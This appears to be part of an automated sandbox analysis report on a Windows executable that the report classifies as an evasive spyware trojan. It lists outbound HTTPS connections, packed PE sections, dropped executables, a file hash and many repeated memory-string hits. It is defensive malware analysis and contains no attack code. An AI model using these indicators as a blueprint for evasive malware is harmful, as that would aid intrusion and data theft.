Source: unknown Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49742 version: TLS 1.2

System Summary

barindex
Source: s31ydU1MpQ.exe Static PE information: section name:
Source: s31ydU1MpQ.exe Static PE information: section name: .idata
Source: s31ydU1MpQ.exe Static PE information: section name:
Source: HXPC21YC8H3Q6AWWXLQHI1I.exe.0.dr Static PE information: section name:
Source: HXPC21YC8H3Q6AWWXLQHI1I.exe.0.dr Static PE information: section name: .idata
Source: BGXAMSUR4L24WR8IH77.exe.0.dr Static PE information: section name:
Source: BGXAMSUR4L24WR8IH77.exe.0.dr Static PE information: section name: .idata
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012FF52D 0_3_012FF52D
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012FF52D 0_3_012FF52D
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012FF52D 0_3_012FF52D
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012FF570 0_3_012FF570
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012FF570 0_3_012FF570
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012FF570 0_3_012FF570
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012FF245 0_3_012FF245
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012FF245 0_3_012FF245
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012FF245 0_3_012FF245
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_013175B8 0_3_013175B8
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_013175B8 0_3_013175B8
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_013175B8 0_3_013175B8
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012FF498 0_3_012FF498
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012FF498 0_3_012FF498
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012FF498 0_3_012FF498
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012D6B63 0_3_012D6B63
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012D6B63 0_3_012D6B63
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012D7479 0_3_012D7479
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012D7479 0_3_012D7479
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012D6B63 0_3_012D6B63
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012D6B63 0_3_012D6B63
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012D7479 0_3_012D7479
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012D7479 0_3_012D7479
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012FF52D 0_3_012FF52D
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012FF52D 0_3_012FF52D
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012FF52D 0_3_012FF52D
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012FF570 0_3_012FF570
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012FF570 0_3_012FF570
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012FF570 0_3_012FF570
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012FF245 0_3_012FF245
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012FF245 0_3_012FF245
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012FF245 0_3_012FF245
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_013175B8 0_3_013175B8
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_013175B8 0_3_013175B8
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_013175B8 0_3_013175B8
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012FF498 0_3_012FF498
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012FF498 0_3_012FF498
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012FF498 0_3_012FF498
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012FF52D 0_3_012FF52D
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012FF52D 0_3_012FF52D
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012FF52D 0_3_012FF52D
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012FF570 0_3_012FF570
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012FF570 0_3_012FF570
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012FF570 0_3_012FF570
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012FF245 0_3_012FF245
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012FF245 0_3_012FF245
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012FF245 0_3_012FF245
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_013175B8 0_3_013175B8
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_013175B8 0_3_013175B8
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_013175B8 0_3_013175B8
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012FF498 0_3_012FF498
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012FF498 0_3_012FF498
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012FF498 0_3_012FF498
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Code function: 10_2_00C8E2EE 10_2_00C8E2EE
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe D8DB10ABDB18394FA74BFB00C68A6AE1A40DE13CF5D0A6620A9A2F1D4571351D
Source: s31ydU1MpQ.exe, 00000000.00000003.1539102821.0000000005D3D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1541249047.0000000005D3F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1532487431.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1531740637.0000000005766000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1545700828.0000000005D42000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1525848647.0000000005A74000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1539346474.0000000005E54000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1538242094.0000000005D40000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1528497915.000000000576B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1538519804.0000000005D3A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1543513698.0000000005D41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1540966099.0000000005F65000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1532179197.0000000005E00000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1531850206.0000000005D44000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1544001542.0000000005D37000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1530531643.0000000005D3C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1545214449.0000000005FB5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1530169105.0000000005D3C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1551864638.0000000005E77000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1530354362.0000000005D3D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1529896819.000000000576C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1543089854.0000000005E57000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1539566404.0000000005D3C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1552303467.0000000005FD3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1537586428.0000000005F22000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1544457159.0000000005E73000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1532940718.0000000005D38000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1540514941.0000000005D38000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1550703981.0000000005E7C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1538094086.0000000005E40000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1544927454.0000000005E70000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1530910475.000000000576D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1552874291.0000000005D45000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1528128624.0000000005770000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1531000576.0000000005D3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1541466407.0000000005E64000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1537095480.0000000005E2E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1549375048.0000000005D37000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1564506807.00000000059D0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1531090653.000000000576B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1540255834.0000000005E54000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1535224894.0000000005F00000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1533251570.0000000005D3C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1529989834.0000000005D37000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1542558790.0000000005D3A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1534345583.0000000005D41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1533164076.0000000005EE3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1533052451.0000000005E11000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1535634291.0000000005E19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1543260587.0000000005F82000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1535807795.0000000005D36000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1538894588.0000000005F41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1538374380.0000000005E45000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1535016161.0000000005E18000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1541847105.0000000005E60000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1549593989.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1537929873.0000000005D3D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1529761509.0000000005D36000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1528294400.000000000576D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1528036300.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1532279261.0000000005D3C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1531612576.0000000005E04000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1530446966.000000000576E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1534198820.0000000005EED000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1528609190.0000000005D3F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1535499864.0000000005D39000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1531943256.0000000005E05000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1551041018.0000000005FC0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1531514994.0000000005D41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1542727011.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1532619992.0000000005D42000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1533463482.0000000005D36000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1542330170.0000000005E57000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1528213766.0000000005D38000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1543717050.0000000005E6E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1528381462.0000000005D3A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1530261765.0000000005770000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1541671597.0000000005D3D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1542062283.0000000005D3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1540754603.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1533345308.0000000005E06000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1563162531.0000000005FFE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1538665972.0000000005E3A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1533693556.0000000005E14000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1530625899.0000000005766000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1530722921.0000000005D44000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1532751669.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1534767260.0000000005D40000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1536118518.0000000005E24000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1536878754.0000000005D3D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1529654284.0000000005775000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1532052507.0000000005D36000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1525848647.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1544629252.0000000005D39000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1550484383.0000000005D3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1550051209.0000000005E80000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1536605828.0000000005F09000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1532386635.0000000005E00000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1549806537.0000000005D37000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1542925287.0000000005D3A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1564333425.0000000005A26000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1551373806.0000000005D37000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1530078315.000000000576D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1530817936.0000000005DF4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1525848647.0000000005A26000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1548613740.0000000005E81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1534531849.0000000005E1B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: s31ydU1MpQ.exe Static PE information: Section: ZLIB complexity 0.9972709760273972
Source: s31ydU1MpQ.exe Static PE information: Section: npsrnsek ZLIB complexity 0.9946172875991458
Source: BGXAMSUR4L24WR8IH77.exe.0.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@5/3@11/4
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HXPC21YC8H3Q6AWWXLQHI1I.exe.log Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Mutant created: NULL
